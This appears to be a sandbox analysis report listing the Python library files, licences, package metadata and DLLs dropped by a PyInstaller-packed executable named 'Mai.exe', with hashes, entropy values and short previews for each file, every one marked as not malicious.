                                                          Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info\METADATA

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):5430
                                                          Entropy (8bit):5.111666659056883
                                                          Encrypted:false
                                                          SSDEEP:96:DxepqZink/QIHQIyzQIZQILuQIR8vtklGovuxNx6rIWwCvCCcT+vIrrr9B+M6VwP:QJnkoBs/stL18cT+vIrrxsM6VwDjyeyM
                                                          MD5:E41411753BDAECA2122B1A0BE1D1FB8B
                                                          SHA1:2B61382D5C0D1C397E918FBDA70EF4A1CCAB986A
                                                          SHA-256:7829C32F69C346DBFEE693D6F00892875FA102ED3A52354AE658A89E0664EA04
                                                          SHA-512:F9519A0C9273E2BA56451499FBBB9288CE1F48752A199594DF5E8109BF6C535A31F9277975D08DC7268DF41F5DC625D9C910986FEBDC81657635C6AAD846E804
                                                          Malicious:false
                                                          Preview:Metadata-Version: 2.1..Name: cryptography..Version: 42.0.0..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info\RECORD

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):15231
                                                          Entropy (8bit):5.557812516579126
                                                          Encrypted:false
                                                          SSDEEP:192:7X6r/nHd5jF4eeIZVhFu4KoF9vZ6FGotqw++NXwvn5tnl:7XSHfCG+onvZ6FGotqw++9wvnd
                                                          MD5:58657B407E7C404DF907823E4A0B17AF
                                                          SHA1:8BD28A940802692E98898643722D12E184280169
                                                          SHA-256:D185BB53C2C08CCC6EDA6B0B377E3CF2201C297AF23ACCD9011126D94AAAB979
                                                          SHA-512:9682D44BEB3C38B6629288A1B34F4B822F4E05AD3EFAE706E2EE3CFC3BAA68EB478E8C6D3A434EC89CF483D8FB31B7A56D4F2E73FA12F087192697F134D7F6B8
                                                          Malicious:false
                                                          Preview:cryptography-42.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-42.0.0.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-42.0.0.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-42.0.0.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-42.0.0.dist-info/METADATA,sha256=eCnDL2nDRtv-5pPW8AiSh1-hAu06UjVK5liongZk6gQ,5430..cryptography-42.0.0.dist-info/RECORD,,..cryptography-42.0.0.dist-info/WHEEL,sha256=ZzJfItdlTwUbeh2SvWRPbrqgDfW_djikghnwfRmqFIQ,100..cryptography-42.0.0.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=I_nLQmdqpHebVAVP95252neXIbkOrc_A0E4Bz91JEOo,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/__about__.cpython-311.pyc,,..cryptography/__pycache__/__init__.cpython-311.pyc,,..cryptography/

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info\WHEEL

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):100
                                                          Entropy (8bit):5.0203365408149025
                                                          Encrypted:false
                                                          SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKciH/KQLn:RtBMwlVCxWKTQLn
                                                          MD5:C48772FF6F9F408D7160FE9537E150E0
                                                          SHA1:79D4978B413F7051C3721164812885381DE2FDF5
                                                          SHA-256:67325F22D7654F051B7A1D92BD644F6EBAA00DF5BF7638A48219F07D19AA1484
                                                          SHA-512:A817107D9F70177EA9CA6A370A2A0CB795346C9025388808402797F33144C1BAF7E3DE6406FF9E3D8A3486BDFAA630B90B63935925A36302AB19E4C78179674F
                                                          Malicious:false
                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info\top_level.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography\hazmat\bindings\_rust.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7203328
                                                          Entropy (8bit):6.564257778736086
                                                          Encrypted:false
                                                          SSDEEP:49152:oFBK593C5Rm30IU6i/GtlqDVwASOVjSiijSd8WbVtd8kOY0PKomemakfqIkWtizi:3jb+1zd8kOywKqyme6V0QVgAAMwYdS1
                                                          MD5:F0DCDBBD5C83F7332B8AF3EADE41F7E2
                                                          SHA1:61F29A8AAE20655012F2CC5FA89CB3D96BA73149
                                                          SHA-256:C52C74AF512F18DE26E7DC8A7BF22D475DDCDAE670A16FAA85CDD53B6C9810A7
                                                          SHA-512:9D5F60BA0F981DBA3B857859DC34A4D150B0615D9A51DD574D0ECAC2D01C2831D1A74F243A77F1B5E4B3DCF67538BD350B1AFF9405C81F89E372866BA494CB30
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..;...;...;.......;..{:...;..{>...;..{?...;..{8...;..z:...;.V.:...;..:...;...:...;..z?...;..{?...;...;...;..{;...;..{9...;.Rich..;.........PE..d...h..e.........." ...&.,S.........4.Q......................................@n...........`...........................................h.p.....h.|.............j.DO...........`m.......b.T.....................b.(.....b.@............@S..............................text....*S......,S................. ..`.rdata.......@S......0S.............@..@.data....!....h.......h.............@....pdata..DO....j..P....i.............@..@.reloc.......`m.......m.............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info\INSTALLER

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):1.5
                                                          Encrypted:false
                                                          SSDEEP:3:Mn:M
                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                          Malicious:false
                                                          Preview:pip.

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info\LICENSE

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):11358
                                                          Entropy (8bit):4.4267168336581415
                                                          Encrypted:false
                                                          SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                          MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                          SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                          SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                          SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                          Malicious:false
                                                          Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info\METADATA

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4926
                                                          Entropy (8bit):5.016007756463111
                                                          Encrypted:false
                                                          SSDEEP:96:Dr8ZSaChm1nTR9GDbHR2ie7QfYpulJGc+vFZoDN00x2jZ2SBXZJSwTE:5hm9fGDbHR2iOQfyurz+D00vJHJSwTE
                                                          MD5:B0BDE2A3F0CD2C95203E4FABB5A8FEB6
                                                          SHA1:85958E584060BDF8D79B52265F93A80CE9F2EEE7
                                                          SHA-256:62FB03CC1D7DE1D50DE44D405B0708302B12F4CCD7FD216D9AE8863DCA767A67
                                                          SHA-512:03537755EB30AE048376B3E161BDAAF8DBD9D5C0968B5A10474C93854E8E4B18F3889EABBBBBA0DBA0EED238A8D165276ABE68452A6C4C8F16E9DFC6159122F3
                                                          Malicious:false
                                                          Preview:Metadata-Version: 2.1.Name: importlib-metadata.Version: 7.0.1.Summary: Read metadata from Python packages.Home-page: https://github.com/python/importlib_metadata.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: perf

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info\RECORD

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):2107
                                                          Entropy (8bit):5.638532930027372
                                                          Encrypted:false
                                                          SSDEEP:48:GnuXtaGGJl/gYbaXM4cXzeom9pvJq/fwJOfYCqO1B4N/3WJV:JX8gYbcqzeRDJsoIYHO1B49qV
                                                          MD5:0F41B810A7A281A29BB6E7A4D3773345
                                                          SHA1:17D035B73CA5216712A1EE5FF890D56F41CC1D87
                                                          SHA-256:509A6C00664FC1DAE981364479F5409497C97698026953F35F2F6DD5ABD170A9
                                                          SHA-512:F74980593ED97EC14AE110E5EA5B8B2ED9E3C6E7A2FABF78698A317BAA407C0688F1F0BCA1A567915EDEF70E8A165E8284EC21F0846F69991DD30E7542C70A0C
                                                          Malicious:false
                                                          Preview:importlib_metadata-7.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-7.0.1.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-7.0.1.dist-info/METADATA,sha256=YvsDzB194dUN5E1AWwcIMCsS9MzX_SFtmuiGPcp2emc,4926..importlib_metadata-7.0.1.dist-info/RECORD,,..importlib_metadata-7.0.1.dist-info/WHEEL,sha256=oiQVh_5PnQM0E3gPdiz09WCNmwiHDMaGer_elqB3coM,92..importlib_metadata-7.0.1.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=CrDhGQz3SCK5Cct82OvmGzqzOqneJn3jLvvfmSx8nCs,31551..importlib_metadata/__pycache__/__init__.cpython-311.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-311.pyc,,..importlib_metadata/__pycache__/_collections.cpython-311.pyc,,..importlib_metadata/__pycache__/_compat.cpython-311.pyc,,..importlib_metadata/__pycache__/_functools.cpython-311.pyc,,..importlib_metadata/__pycache__/_itertools.cpython-311.pyc,,..imp

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info\WHEEL

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):92
                                                          Entropy (8bit):4.8343614255301075
                                                          Encrypted:false
                                                          SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tPCCfA5S:RtBMwlVCxWBBf
                                                          MD5:A227BF38FB17005B3BDB56CCC428B1BB
                                                          SHA1:502F95DA3089549E19C451737AA262E45C5BC3BC
                                                          SHA-256:A2241587FE4F9D033413780F762CF4F5608D9B08870CC6867ABFDE96A0777283
                                                          SHA-512:A0BA37A0B2F3D4AE1EE2B09BB13ED20912DB4E6A009FE9BA9414830AD4FDBF58571E195ABBE0D19F5582E2CF958CFB49FFDACD7C5182008699F92A0F5EEC6C41
                                                          Malicious:false
                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: true.Tag: py3-none-any..

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info\top_level.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\libcrypto-3.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5157656
                                                          Entropy (8bit):5.95816549046812
                                                          Encrypted:false
                                                          SSDEEP:98304:OH+jTaoFABs2NPAE7uLcdKmj8waP31CPwDvt3uFlDC:kQ+Bs2NQcdKmj8waP1CPwDvt3uFlDC
                                                          MD5:7A6A8C2A8C379B111CDCEB66B18D687D
                                                          SHA1:F3B8A4C731FA0145F224112F91F046FDDF642794
                                                          SHA-256:8E13B53EE25825B97F191D77B51ED03966F8B435773FA3FBC36F3EB668FC569B
                                                          SHA-512:F2EF1702DF861EF55EF397AD69985D62B675D348CAB3862F6CA761F1CE3EE896F663A77D7B69B286BE64E7C69BE1215B03945781450B186FC02CFB1E4CB226B5
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d......d.........." ...#..6..&......v.........................................O......eO...`..........................................zG.0.....M.@.... N.s.....K......N../...0N......bC.8...........................0aC.@.............M..............................text...t.6.......6................. ..`.rdata........6.......6.............@..@.data....n....J..<...vJ.............@....pdata........K.......J.............@..@.idata...%....M..&....M.............@..@.00cfg..u.....N.......M.............@..@.rsrc...s.... N.......M.............@..@.reloc..S....0N.......M.............@..B................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\libffi-8.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39696
                                                          Entropy (8bit):6.641880464695502
                                                          Encrypted:false
                                                          SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                          MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                          SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                          SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                          SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\libssl-3.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):789784
                                                          Entropy (8bit):5.607345956416271
                                                          Encrypted:false
                                                          SSDEEP:6144:9jurAr6yUDGpdXh3Mr3r0oARnjmeUl4XOnZiRtw036WgfCBL5JyJ/OiFe9XbI:9MT6h3M7VxKXOrqdeOiFe9Xb
                                                          MD5:64ACB046FE68D64EE475E19F67253A3C
                                                          SHA1:D9E66C9437CE6F775189D6FDBD171635193EC4CC
                                                          SHA-256:B21309ABD3DBBB1BF8FB6AA3C250FC85D7B0D9984BF4C942D1D4421502F31A10
                                                          SHA-512:F8B583981DF528CF4F1854B94EFF6F51DD9D4BE91E6FA6329A8C4435B705457C868AE40EE030FA54BEBB646A37B547BC182C9CBF0DF9A07FEA03A18CF85C6766
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...T...T...].3.Z......V......V......X......\......P.....W...T...H.....e.....U...._.U.....U...RichT...................PE..d....d.........." ...#.4..........K........................................0...........`..........................................x...Q..............i.... ..|M......./......`.......8...............................@............................................text...D3.......4.................. ..`.rdata...y...P...z...8..............@..@.data....N.......H..................@....pdata..dV... ...X..................@..@.idata...c.......d...R..............@..@.00cfg..u...........................@..@.rsrc...i...........................@..@.reloc..?...........................@..B........................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\pyexpat.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):199448
                                                          Entropy (8bit):6.374698779434704
                                                          Encrypted:false
                                                          SSDEEP:3072:ZKABBH4pwa0bGheNSeFPyP7pgE7xhAq36exBce56iXfVhyAJ1Ohc2gZtIsLh5Aj:ZBBHCqGheNSe9YeE7/AqV1XfPym2yk
                                                          MD5:CDCF0E74A32AD7DFEDA859A0CE4FCB20
                                                          SHA1:C72B42A59BA5D83E8D481C6F05B917871B415F25
                                                          SHA-256:91FE5B1B2DE2847946E5B3F060678971D8127DFD7D2D37603FDCD31BD5C71197
                                                          SHA-512:C26FDF57299B2C6085F1166B49BD9608D2DD8BC804034EBB03FB2BBA6337206B6018BF7F74C069493FFAE42F2E9D6337F6F7DF5306B80B63C8C3A386BCE69EA6
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.]...3...3...3.......3...2...3...6...3...7...3...0...3...2...3.L.2...3...2.s.3...>...3...3...3......3...1...3.Rich..3.........PE..d....k.d.........." ...$..................................................... ............`.............................................P................................/..........`3..T........................... 2..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...@!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\python3.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):67352
                                                          Entropy (8bit):6.145559867069682
                                                          Encrypted:false
                                                          SSDEEP:768:ow/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJS7:P/5k8cnzeJptIsL0t7Sym1xm
                                                          MD5:0E105F62FDD1FF4157560FE38512220B
                                                          SHA1:99BD69A94B3DC99FE2C0F7BBBCD05AA0BC8CD45C
                                                          SHA-256:803BA8242B409080DF166320C05A4402AAB6DD30E31C4389871F4B68CA1AD423
                                                          SHA-512:59C0F749ED9C59EFDBCD04265B4985B1175FDD825E5A307745531ED2537397E739BC9290FDC3936CFD04F566E28BB76B878F124248B8344CF74F641C6B1101DE
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M...,e..,e..,e..Sm..,e..Se..,e..S...,e..Sg..,e.Rich.,e.........PE..d....k.d.........." ...$............................................................4.....`.........................................`...P................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\python311.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5765912
                                                          Entropy (8bit):6.089565479797802
                                                          Encrypted:false
                                                          SSDEEP:98304:BBduVia4N3NWLvJP8IjF/d/aHMMwuPQyFF+RdioiZPbwappjDq:BBduVv4N3ILvJ8M/4wZy3+RdioiZPbwl
                                                          MD5:58E01ABC9C9B5C885635180ED104FE95
                                                          SHA1:1C2F7216B125539D63BD111A7ABA615C69DEB8BA
                                                          SHA-256:DE1B95D2E951FC048C84684BC7DF4346138910544EE335B61FC8E65F360C3837
                                                          SHA-512:CD32C77191309D99AEED47699501B357B35669123F0DD70ED97C3791A009D1855AB27162DB24A4BD9E719B68EE3B0539EE6DB88E71ABB9A2D4D629F87BC2C081
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ed..Ed..Ed......Gd......Kd......Id......Md......Ad..L.{._d......Nd..Ed.. e.._...d.._...Dd.._...Dd.._...Dd..RichEd..................PE..d....k.d.........." ...$.`%..87......K........................................\.....nMX...`...........................................@......ZA......p[.......V..0....W../....[..B....).T...........................`.).@............p%..............................text...._%......`%................. ..`.rdata.......p%......d%.............@..@.data.........A..L...tA.............@....pdata...0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc........p[......~V.............@..@.reloc...B....[..D....V.............@..B................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32\pywintypes311.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):134656
                                                          Entropy (8bit):5.995319660651805
                                                          Encrypted:false
                                                          SSDEEP:3072:luJ2G0a2fYrFceQaVK756Y/r06trRjEKQze7KN9eJKVKG6j1J:luJ2faiYrFceQaVfY/rx1eze7KbewVrk
                                                          MD5:90B786DC6795D8AD0870E290349B5B52
                                                          SHA1:592C54E67CF5D2D884339E7A8D7A21E003E6482F
                                                          SHA-256:89F2A5C6BE1E70B3D895318FDD618506B8C0E9A63B6A1A4055DFF4ABDC89F18A
                                                          SHA-512:C6E1DBF25D260C723A26C88EC027D40D47F5E28FC9EB2DBC72A88813A1D05C7F75616B31836B68B87DF45C65EEF6F3EAED2A9F9767F9E2F12C45F672C2116E72
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\select.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):30488
                                                          Entropy (8bit):6.586478365575897
                                                          Encrypted:false
                                                          SSDEEP:384:dEeecReJKuHq1W57AvB0EZtIsQGQHQIYiSy1pCQvC5HAM+o/8E9VF0Ny5X3:XeUeJPHqoGDtIsQGq5YiSyvmAMxkE/3
                                                          MD5:653BDCCB7AF2AA9CCF50CB050FD3BE64
                                                          SHA1:AFE0A85425AE911694C250AB4CB1F6C3D3F2CC69
                                                          SHA-256:E24A3E7885DF9A18C29BA058C49C3ADCF59E4B58107847B98ECA365B6D94F279
                                                          SHA-512:07E841FDA7A2295380BFA05DB7A4699F18C6E639DA91D8EE2D126D4F96E4CDDAEDBD490DEB4D2A2E8E5877EDFFF877693F67A9DC487E29742943E062D7BE6277
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t..'..'..'...'..'...&..'...&..'...&..'...&..'...&..'..'..'...&..'...&..'...&..'..c'..'...&..'Rich..'........................PE..d....k.d.........." ...$.....2......................................................;.....`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\sqlite3.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1504536
                                                          Entropy (8bit):6.579196400879108
                                                          Encrypted:false
                                                          SSDEEP:24576:P5EGpXUzJLtMyDHeWWAENOp8TaqQqP/mPhp44gyBGAidNlY30VM:PvqFLtMIHeWWA+U8TaYQhpzgycAPn
                                                          MD5:B49B8FDE59EE4E8178C4D02404D06EE7
                                                          SHA1:1816FC83155D01351E191D583C68E722928CCE40
                                                          SHA-256:1AFD7F650596AD97FCF358B0E077121111641C38CA9D53132BAB4C9588CF262F
